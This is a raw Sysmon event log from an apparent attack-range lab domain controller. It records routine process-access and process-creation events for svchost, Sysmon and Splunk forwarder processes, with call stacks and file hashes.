13:37:45.999{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:45.999{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.999{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:45.999{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.999{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:45.999{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.999{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:45.999{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.999{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.999{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8F29-6005-ED00-00000000A301}3304C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.999{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8F29-6005-ED00-00000000A301}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.999{59A5CD1D-8F29-6005-ED00-00000000A301}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:47.468{59A5CD1D-8F2B-6005-EE00-00000000A301}22683988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:47.327{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8F2B-6005-EE00-00000000A301}2268C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:47.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:47.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:47.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:47.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:47.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:47.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:47.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:47.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:47.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:47.327{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8F2B-6005-EE00-00000000A301}2268C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:47.327{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8F2B-6005-EE00-00000000A301}2268C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:47.328{59A5CD1D-8F2B-6005-EE00-00000000A301}2268C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.734{59A5CD1D-8F2C-6005-F000-00000000A301}34524608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program 